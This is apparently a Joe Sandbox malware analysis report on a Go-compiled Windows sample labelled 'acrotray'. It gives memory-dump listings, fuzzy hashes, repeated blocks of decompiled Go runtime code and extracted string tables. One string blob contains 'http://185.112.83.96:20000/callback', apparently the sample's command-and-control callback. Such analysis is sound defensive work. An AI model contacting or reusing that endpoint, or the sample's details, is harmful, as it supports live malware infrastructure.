    • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h, xrefs: 0043DA52
    Memory Dump Source
    • Source File: 00000000.00000002.561154146.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.561141957.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.563111718.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563154244.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563206160.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563247920.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000000.00000002.563301155.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000000.00000002.563362983.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.jbxd
    Similarity
    • API ID:
    • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req$ m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown $releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h
    • API String ID: 0-348477168
    • Opcode ID: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction ID: ad9af52888aaabd5dc0dbb80f5b1bf5a2b8d008500c109696c00bffb4176632a
    • Opcode Fuzzy Hash: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction Fuzzy Hash: B961F23A209F84C5DB009F16F08535AB7A8F789B98F559066EACC07B29DF7CC0A4CB04
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    Non-executed Functions

    C-Code - Quality: 60%
    			E00431270(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __rdi, long long __rbp, void* __r9) {
    				char _v8;
    				char _v32;
    				intOrPtr _v48;
    				char _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				char _v88;
    				long long _v104;
    				long long _v128;
    				long long _v136;
    				long long _v144;
    				long long _v152;
    				void* _t42;
    				void* _t60;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				long long _t78;
    				intOrPtr _t82;
    				long long _t88;
    				long long _t89;
    				long long _t94;
    				long long* _t95;
    				void* _t100;
    				long long* _t101;
    				void* _t103;
    
    				L0:
    				while(1) {
    					L0:
    					_t103 = __r9;
    					_t98 = __rbp;
    					_t64 = __esp;
    					_t63 = __esi;
    					_t62 = __edi;
    					_t61 = __edx;
    					_t60 = __ecx;
    					if( &_v32 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L7;
    					}
    					L1:
    					_t101 = _t100 - 0xa0;
    					_v8 = __rbp;
    					_t98 =  &_v8;
    					_v88 = 0;
    					 *_t101 =  *0x8960f0;
    					_v152 = 0xffffffff;
    					_v144 = 0xfffffffe;
    					_v136 = 0xffffffff;
    					_v128 =  &_v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x28], xmm0");
    					_v104 = 2;
    					E00431980( &_v8);
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x30)) + 0x278)) = _v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x68], xmm0");
    					asm("movups [esp+0x78], xmm0");
    					asm("movups [esp+0x88], xmm0");
    					 *_t101 =  *0x896040;
    					_v152 =  &_v56;
    					_t78 =  &_v56;
    					_v144 = _t78;
    					_v136 = 0x30;
    					_t42 = E00431780( &_v8);
    					if(_v128 == 0) {
    						L6:
    						E004601C0();
    						_v72 = _t78;
    						L00433D40( *_t101, _t98);
    						 *_t101 =  &M006F3C3B;
    						_v152 = 0x24;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v72;
    						E004343F0(_t60, _t62, _t63, _t64, _t98, _t103);
    						L00433DD0(L00433FD0(_t60, _t61, _t62, _t63, _t64, _t98, _t103), _t98);
    						 *_t101 = "VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting request body writehttp: connection has been hijackedhttp: persistConn.readLoop exitinghttp: read on closed response bodyinvalid padding bits in BIT STRINGmspan.ensureSwept: m is not lockedout of memory allocating allArenasreflect.FuncOf: too many argumentsreflect: Field index out of boundsreflect: Method index out of rangereflect: string index out of rangeruntime.SetFinalizer: cannot pass runtime: g is running but p is notruntime: unexpected return pc for schedule: spinning with local workstream error: stream ID %d; %v; %vtimeout waiting for client prefacetls: invalid certificate signaturetls: malformed key_share extensiontoo many references: cannot spliceunexpected runtime.netpoll error: unsupported authentication method x509: Ed25519 verification failurex509: unhandled critical extension%d response missing Location header\'_\' must separate successive digits1776356839400250464677810668945312588817841970012523233890533447265625CONTINUATION frame with stream ID 0SubscribeServiceChangeNotificationschacha20: output smaller than inputcrypto/md5: invalid hash state sizedynamic table size update too largeed25519: cannot sign hashed messageencoding/hex: odd length hex stringexecutable file not found in %PATH%file type does not support deadlinefindfunc: bad findfunctab entry idxfindrunnable: netpoll with spinningflate: corrupt input before offset greyobject: obj not pointer-alignedhash/crc32: invalid hash state sizehpack: invalid Huffman-encoded datahttp: server closed idle connectionhttp://185.112.83.96:20000/callbackmheap.freeSpanLocked - invalid freemime: bogus characters after %%: %qmime: invalid RFC 2047 encoded-wordnetwork dropped connection on resetno such multicast network interfacepersistentalloc: align is too largepidleput: P has non-empty run queuereflect.MakeSlice of non-slice typeruntime: close polldesc w/o unblockruntime: createevent failed; errno=runtime: inconsistent read deadlinesuperfluous leading zeros in lengthtls: invalid or missing PSK binderstls: server selected an invalid PSKtls: too many non-advancing recordstoo many Questions to pack (>65535)traceback did not unwind completelytransform: short destination buffertransport endpoint is not connectedx509: decryption password incorrectx509: wrong Ed25519 public key sizezlib: invalid compression level: %d LastStreamID=%v ErrCode=%v Debug=%q0123456789abcdefghijklmnopqrstuvwxyz44408920985006261616945266723632812586b4f9e6-366b-47b0-ab4e-15c6cd2f7074Go pointer stored into non-Go memoryIA5String contains invalid characterMStats vs MemStatsType size mismatchTime.UnmarshalBinary: invalid lengthUnable to determine system directoryaccessing a corrupted shared librarycompressed name in SRV resource datacrypto/cipher: input not full blockscrypto/rand: argument to Int is <= 0crypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functionhttp: no Location header in responsehttp: unexpected EOF reading trailermalformed MIME header initial line: no acceptable authentication methodsreflect: IsVariadic of non-func typereflect: NumField of non-struct typereflect: funcLayout of non-func typeruntime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime: unblock on closing polldescruntime: wrong goroutine in newstackstrings.Builder.Grow: negative countsyntax error scanning complex numbertls: server did not send a key shareuncaching span but s.allocCount == 0unsupported SSLv2 handshake receivedx509: zero or negative DSA parameter) is smaller than minimum page size (2220446049250313080847263336181640625Could not Create DIB Section err:%d.\nCould not Get primary display err:%d\nUnsubscribeServiceChangeNotifications_cgo_notify_runtime_init_done missingall goroutines are asleep - deadlock!bytes.Buffer: truncation out of rangecannot exec a shared library directlychacha20poly1305: plaintext too largecipher: message authentication failedcrypto/cipher: incorrect GCM tag sizecrypto/cipher: invalid buffer overlapcrypto/rsa: public exponent too largecrypto/rsa: public exponent too smallcrypto/rsa: unsupported hash functioncrypto: Size of unknown hash functionexplicitly tagged member didn\'t matchhash/adler32: invalid hash state sizeinternal error: unknown network type reflect.Value.Bytes of non-byte slicereflect.Value.Bytes of non-rune slicereflect: Bits of non-arithmetic Type runtime: allocation size out of rangeruntime: failed mSpanList.insertBack setprofilebucket: profile already setstartTheWorld: inconsistent mp->nextpsubtle: slices have different lengthstls: unsupported certificate key (%T)too many Additionals to pack (>65535)too many Authorities to pack (>65535)unexpected CONTINUATION for stream %dvalue too large for defined data typex509: RSA key missing NULL parameters1110223024625156540423631668090820312555511151231257827021181583404541015625Could not Get primary display err:%d.\nUnable to determine system directory: arg size to reflect.call more than 1GBcan not access a needed shared librarychacha20poly1305: ciphertext too largeconcurrent map iteration and map writecrypto/sha256: invalid hash state sizecrypto/sha512: invalid hash state sizeencoding alphabet is not 64-bytes longfailed to parse Location header %q: %vgcBgMarkWorker: blackening not enabledinsufficient data for base length typeinternal error: unknown string type %dmakechan: invalid channel element typemime: expected slash after first tokennet/http: invalid header field name %qruntime: blocked read on free polldescruntime: sudog with non-false isSelecttime: missing Location in call to Datetls: client sent unexpected early datatls: failed to sign ECDHE parameters: tls: internal error: unsupported curvetls: invalid ClientKeyExchange messagetls: invalid ServerKeyExchange messagetls: missing ServerKeyExchange messagetls: server selected unsupported curvetls: server selected unsupported grouptls: unsupported signing key type (%T)x509: cannot validate certificate for x509: empty name constraints extensionx509: trailing data after X.509 key-id because it doesn\'t contain any IP SANs2006-01-02 15:04:05.999999999 -0700 MST277555756156289135105907917022705078125Could not Create Compatible DC err:%d.\nPowerRegisterSuspendResumeNotification";
    						_v152 = 0x22;
    						L00433220(_t98);
    						goto L7;
    					}
    					L2:
    					_t82 = _v48;
    					_t94 = _t82 + 0x4000;
    					_v80 = _t94;
    					_t95 =  *((intOrPtr*)( *[gs:0x28]));
    					_t89 =  *((intOrPtr*)(_t95 + 8));
    					_v64 = _t89;
    					if(_t94 > _t89 || _t89 > 0x4000000) {
    						L5:
    						L00433D40(_t42, _t98);
    						 *_t101 =  &M006EBF74;
    						_v152 = 0x13;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v80;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 =  &M006E6129;
    						_v152 = 1;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v64;
    						L00434560(_t61, _t62, _t63, _t64, _t98, _t103);
    						 *_t101 = 0x6e6161;
    						_v152 = 2;
    						L00433DD0(L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103), _t98);
    						_t78 =  &M006E88B1;
    						 *_t101 = _t78;
    						_v152 = 0xc;
    						L00433220(_t98);
    						goto L6;
    					}
    					L4:
    					 *_t95 = _t94;
    					_t88 = _t82 + 0x5370;
    					 *((long long*)(_t95 + 0x10)) = _t88;
    					 *((long long*)(_t95 + 0x18)) = _t88;
    					return E0045E250(_t42);
    					L8:
    					L7:
    					E0045C900(_t95, _t98);
    				}
    			}































    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431270
    0x00431289
    0x00000000
    0x00000000
    0x0043128f
    0x0043128f
    0x00431296
    0x0043129e
    0x004312a6
    0x004312b6
    0x004312ba
    0x004312c3
    0x004312cc
    0x004312da
    0x004312df
    0x004312e2
    0x004312e7
    0x004312f0
    0x0043130e
    0x00431315
    0x00431318
    0x0043131d
    0x00431322
    0x00431331
    0x0043133a
    0x0043133f
    0x00431344
    0x00431349
    0x00431352
    0x0043135d
    0x0043144e
    0x0043144e
    0x00431456
    0x0043145b
    0x00431467
    0x0043146b
    0x00431474
    0x0043147e
    0x00431482
    0x0043148c
    0x00431498
    0x0043149c
    0x004314a5
    0x00000000
    0x004314a5
    0x00431363
    0x00431363
    0x00431368
    0x0043136f
    0x0043137d
    0x00431384
    0x00431388
    0x00431390
    0x004313c4
    0x004313c4
    0x004313d0
    0x004313d4
    0x004313dd
    0x004313e7
    0x004313eb
    0x004313f7
    0x004313fb
    0x00431404
    0x0043140e
    0x00431412
    0x0043141e
    0x00431422
    0x00431430
    0x00431435
    0x0043143c
    0x00431440
    0x00431449
    0x00000000
    0x00431449
    0x0043139e
    0x0043139e
    0x004313a1
    0x004313a7
    0x004313ab
    0x004313c3
    0x00000000
    0x004314ab
    0x004314ab
    0x004314ab

    Strings
    • runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu, xrefs: 004313C9
    • 0, xrefs: 00431349
    • VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques, xrefs: 00431491
    • ", xrefs: 0043149C
    • runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:, xrefs: 00431460
    • bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb, xrefs: 00431435
    • ,-./0456:;<=>?@BCLMNOPSZ["\, xrefs: 004313F0
    Memory Dump Source
    • Source File: 00000029.00000002.561032696.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000029.00000002.561014676.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000029.00000002.562300176.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562323354.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562337870.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562352012.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562366691.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000029.00000002.562380356.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_41_2_400000_acrotray.jbxd
    Similarity
    • API ID:
    • String ID: "$,-./0456:;<=>?@BCLMNOPSZ["\$0$VirtualQuery for stack base failedadding nil Certificate to CertPoolcrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapcrypto/rsa: missing public modulusforEachP: sched.safePointWait != 0http2: aborting reques$bad g0 stackbad recoveryc ap trafficc hs trafficcaller errorcan't happencas64 failedchan receiveclose notifycomctl32.dllcomdlg32.dllcontent-typecontext.TODOdebugCall128dumping heapend tracegcentersyscallexit status gcpacertracegetaddrinfowhost is downhttp2deb$runtime: VirtualQuery failed; errno=runtime: bad notifyList size - sync=runtime: inconsistent write deadlineruntime: invalid pc-encoded table f=runtime: invalid typeBitsBulkBarrierruntime: mcall called on m->g0 stackruntime: sudog with non-nil waitlinkruntime:$runtime: g0 stack [runtime: insert t= runtime: pcdata is runtime: preempt g0semaRoot rotateLeftskip this directorystopm holding lockssync.Cond is copiedtoo many open filestoo much pixel dataunknown Go type: %vunknown certificateunknown cipher typeunknown statu
    • API String ID: 0-735344959
    • Opcode ID: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction ID: 406224d717a5126b36259e59a2dfcca9e8291f132d8d349d47811cb3184dca4b
    • Opcode Fuzzy Hash: 9fff890d98466b29b5cc5f42db71fad23afb86daac7df5ea3f2d2c96fe400bb3
    • Instruction Fuzzy Hash: C7513836508F8185DB10DF55F48539AB3A4F7897A4F50922AEADC03BA9EF7CC1A4CB04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0043D8E0(long long __rbp, long long _a8) {
    				char _v8;
    				long long _v16;
    				long long _v24;
    				long long _v32;
    				long long _v40;
    				long long _v48;
    				long long _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				void* _t59;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				void* _t82;
    				void* _t83;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				long long _t96;
    				long long _t98;
    				intOrPtr _t99;
    				long long _t102;
    				long long _t120;
    				intOrPtr _t123;
    				intOrPtr _t125;
    				long long _t128;
    				void* _t134;
    				long long* _t135;
    				void* _t137;
    				void* _t138;
    				void* _t139;
    				void* _t140;
    				void* _t141;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    
    				L0:
    				while(1) {
    					L0:
    					_t132 = __rbp;
    					if(_t134 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L11;
    					}
    					L1:
    					_t135 = _t134 - 0x58;
    					_v8 = __rbp;
    					_t132 =  &_v8;
    					_t96 =  *((intOrPtr*)( *[gs:0x28]));
    					_t123 =  *((intOrPtr*)(_t96 + 0x30));
    					_t128 =  *((intOrPtr*)(_t123 + 0xa0));
    					if(_t128 == 0 ||  *((long long*)(_t123 + 0x130)) == 0) {
    						L10:
    						 *_t135 =  &M006ECFA3;
    						_v80 = 0x15;
    						L00433220(_t132);
    						goto L11;
    					}
    					L3:
    					_v48 = _t96;
    					 *_t135 = _t128;
    					_t62 = E00441E60(_t59);
    					_t98 = _v80;
    					_v56 = _t98;
    					 *_t135 =  *((intOrPtr*)(_t98 + 0x38));
    					_t63 = E00441E80(_t62);
    					_t99 = _v48;
    					_t125 =  *((intOrPtr*)(_t99 + 0x30));
    					if(_v80 != _t125) {
    						L9:
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						_t64 = E00441E60(_t63);
    						_t102 =  *((intOrPtr*)(_v48 + 0x30));
    						_v16 = _t102;
    						_v24 = _v80;
    						_t128 = _v56;
    						_t119 =  *((intOrPtr*)(_t128 + 0x38));
    						_v64 =  *((intOrPtr*)(_t128 + 0x38));
    						_v32 =  *((intOrPtr*)(_t102 + 0x130));
    						_t130 =  *((intOrPtr*)(_t128 + 0x40));
    						_v40 =  *((intOrPtr*)(_t128 + 0x40));
    						_v72 = _t128;
    						L00433D40(_t64, _t132);
    						 *_t135 =  &M006E8A9D;
    						_v80 = 0xc;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v16;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68dd;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x38)), _t128, _t132, _t138);
    						 *_t135 = _v24;
    						L00434650(_t82, _t85, _t86, _t87,  *((intOrPtr*)(_t128 + 0x40)), _t132, _t138);
    						 *_t135 = 0x6e68e9;
    						_v80 = 6;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v64;
    						L00434560( *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138);
    						 *_t135 =  &M006E7E63;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v32;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E8F;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v40;
    						L00434650(_t82, _t85, _t86, _t87, _t130, _t132, _t138);
    						 *_t135 =  &M006E7E9A;
    						_v80 = 0xb;
    						L004346A0(_t82, _t85, _t86, _t87, _t119, _t128, _t132, _t138);
    						 *_t135 = _v72;
    						E004343F0(_t82, _t85, _t86, _t87, _t132, _t138);
    						L00433DD0(L00433FD0(_t82,  *((intOrPtr*)(_t128 + 4)), _t85, _t86, _t87, _t132, _t138), _t132);
    						 *_t135 = 0x6ef0e1;
    						_v80 = 0x19;
    						L00433220(_t132);
    						goto L10;
    					}
    					L4:
    					_t120 = _v56;
    					if( *((intOrPtr*)(_t120 + 0x40)) !=  *((intOrPtr*)(_t125 + 0x130)) ||  *((intOrPtr*)(_t120 + 4)) != 1) {
    						goto L9;
    					}
    					L6:
    					if( *0x8e6e10 != 0) {
    						 *_t135 =  *((intOrPtr*)(_t125 + 0xa0));
    						E00441E60(_t63);
    						 *_t135 = _v80;
    						_t63 = E00450DD0(_t83, _t87,  &_v8, _t137, _t138, _t139, _t140, _t141, _t142, _t143, _t144);
    						_t99 = _v48;
    						_t120 = _v56;
    					}
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0xa0)) = 0;
    					 *((long long*)( *((intOrPtr*)(_t99 + 0x30)) + 0x130)) = 0;
    					 *((long long*)(_t120 + 0x38)) = 0;
    					 *((intOrPtr*)(_t120 + 4)) = 0;
    					_a8 = _t120;
    					return _t63;
    					L12:
    					L11:
    					E0045C900(_t128, _t132);
    				}
    			}








































    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8e0
    0x0043d8f4
    0x00000000
    0x00000000
    0x0043d8fa
    0x0043d8fa
    0x0043d8fe
    0x0043d903
    0x0043d911
    0x0043d918
    0x0043d91c
    0x0043d926
    0x0043db5f
    0x0043db66
    0x0043db6a
    0x0043db73
    0x00000000
    0x0043db73
    0x0043d93a
    0x0043d93a
    0x0043d93f
    0x0043d943
    0x0043d948
    0x0043d94d
    0x0043d956
    0x0043d95a
    0x0043d95f
    0x0043d964
    0x0043d96d
    0x0043d9fa
    0x0043da01
    0x0043da05
    0x0043da0f
    0x0043da13
    0x0043da1d
    0x0043da22
    0x0043da27
    0x0043da2b
    0x0043da37
    0x0043da3c
    0x0043da40
    0x0043da48
    0x0043da4d
    0x0043da59
    0x0043da5d
    0x0043da66
    0x0043da70
    0x0043da74
    0x0043da80
    0x0043da84
    0x0043da8d
    0x0043da97
    0x0043da9b
    0x0043daa7
    0x0043daab
    0x0043dab4
    0x0043dabe
    0x0043dac2
    0x0043dace
    0x0043dad2
    0x0043dadb
    0x0043dae5
    0x0043dae9
    0x0043daf5
    0x0043daf9
    0x0043db02
    0x0043db0c
    0x0043db10
    0x0043db1c
    0x0043db20
    0x0043db29
    0x0043db33
    0x0043db37
    0x0043db41
    0x0043db4d
    0x0043db51
    0x0043db5a
    0x00000000
    0x0043db5a
    0x0043d973
    0x0043d97a
    0x0043d983
    0x00000000
    0x00000000
    0x0043d98b
    0x0043d992
    0x0043d9d7
    0x0043d9db
    0x0043d9e5
    0x0043d9e9
    0x0043d9ee
    0x0043d9f3
    0x0043d9f3
    0x0043d998
    0x0043d9a7
    0x0043d9b2
    0x0043d9ba
    0x0043d9c1
    0x0043d9cf
    0x00000000
    0x0043db79
    0x0043db79
    0x0043db79

    Strings
    • releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h, xrefs: 0043DA52
    • releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown , xrefs: 0043DB5F
    • m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy, xrefs: 0043DA79
    • m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req, xrefs: 0043DAC7
    Memory Dump Source
    • Source File: 00000029.00000002.561032696.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000029.00000002.561014676.0000000000400000.00000002.00020000.sdmp Download File
    • Associated: 00000029.00000002.562300176.00000000008DC000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562323354.00000000008F7000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562337870.00000000008FA000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562352012.00000000008FD000.00000040.00020000.sdmp Download File
    • Associated: 00000029.00000002.562366691.00000000008FE000.00000080.00020000.sdmp Download File
    • Associated: 00000029.00000002.562380356.00000000008FF000.00000004.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_41_2_400000_acrotray.jbxd
    Similarity
    • API ID:
    • String ID: m->mcache= mallocing= ms clock, nBSSRoots= p->mcache= p->status= pageSize= s.nelems= schedtick= span.list=%!(BADPREC), s.base()=, s.npages=, settings:.WithCancel/dev/stderr/dev/stdout/index.html30517578125: frame.sp=; Max-Age=0AppServicesBad GatewayBad Req$ m->p= next= p->m= prev= span= varp=%d.exe(...), not , val 390625<-chanAcceptAnswerArabicAugustBasic BitBltBrahmiCANCELCarianChakmaCommonCookieCopticDELETEEndDocExpectFormatFridayGOAWAYGOROOTGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLineToLockedLy$releasep: invalid argruntime: confused by runtime: newstack at runtime: newstack sp=runtime: work.nwait= sequence tag mismatchstale NFS file handlestartlockedm: m has pstartm: m is spinningstate not recoverablestopg: invalid statustrace/breakpoint trapunknown $releasep: m=remote errorruntime: f= runtime: gp=s ap traffics hs trafficsetupapi.dllshort buffert.mcount > 0t.xcount > 0transmitfileunknown portwintrust.dllwirep: p->m=wtsapi32.dll != sweepgen MB released MB) workers= called from flushedWork gcscanvalid h
    • API String ID: 0-348477168
    • Opcode ID: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction ID: ad9af52888aaabd5dc0dbb80f5b1bf5a2b8d008500c109696c00bffb4176632a
    • Opcode Fuzzy Hash: 4f1bc768ba684713f7d49c4cf9a919cb4985d05402df9d85e91072940844604f
    • Instruction Fuzzy Hash: B961F23A209F84C5DB009F16F08535AB7A8F789B98F559066EACC07B29DF7CC0A4CB04
    Uniqueness

    Uniqueness Score: -1.00%

    Executed Functions

    Non-executed Functions

    C-Code - Quality: 60%
    			E00431270(void* __ecx, void* __edx, void* __edi, void* __esi, void* __esp, void* __rdi, long long __rbp, void* __r9) {
    				char _v8;
    				char _v32;
    				intOrPtr _v48;
    				char _v56;
    				long long _v64;
    				long long _v72;
    				long long _v80;
    				char _v88;
    				long long _v104;
    				long long _v128;
    				long long _v136;
    				long long _v144;
    				long long _v152;
    				void* _t42;
    				void* _t60;
    				void* _t61;
    				void* _t62;
    				void* _t63;
    				void* _t64;
    				long long _t78;
    				intOrPtr _t82;
    				long long _t88;
    				long long _t89;
    				long long _t94;
    				long long* _t95;
    				void* _t100;
    				long long* _t101;
    				void* _t103;
    
    				L0:
    				while(1) {
    					L0:
    					_t103 = __r9;
    					_t98 = __rbp;
    					_t64 = __esp;
    					_t63 = __esi;
    					_t62 = __edi;
    					_t61 = __edx;
    					_t60 = __ecx;
    					if( &_v32 <=  *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x10))) {
    						goto L7;
    					}
    					L1:
    					_t101 = _t100 - 0xa0;
    					_v8 = __rbp;
    					_t98 =  &_v8;
    					_v88 = 0;
    					 *_t101 =  *0x8960f0;
    					_v152 = 0xffffffff;
    					_v144 = 0xfffffffe;
    					_v136 = 0xffffffff;
    					_v128 =  &_v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x28], xmm0");
    					_v104 = 2;
    					E00431980( &_v8);
    					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[gs:0x28])) + 0x30)) + 0x278)) = _v88;
    					asm("xorps xmm0, xmm0");
    					asm("movups [esp+0x68], xmm0");
    					asm("movups [esp+0x78], xmm0");
    					asm("movups [esp+0x88], xmm0");
    					 *_t101 =  *0x896040;
    					_v152 =  &_v56;
    					_t78 =  &_v56;
    					_v144 = _t78;
    					_v136 = 0x30;
    					_t42 = E00431780( &_v8);
    					if(_v128 == 0) {
    						L6:
    						E004601C0();
    						_v72 = _t78;
    						L00433D40( *_t101, _t98);
    						 *_t101 =  &M006F3C3B;
    						_v152 = 0x24;
    						L004346A0(_t60, _t62, _t63, _t64, _t89, _t95, _t98, _t103);
    						 *_t101 = _v72;
    						E004343F0(_t60, _t62, _t63, _t64, _t98, _t103);
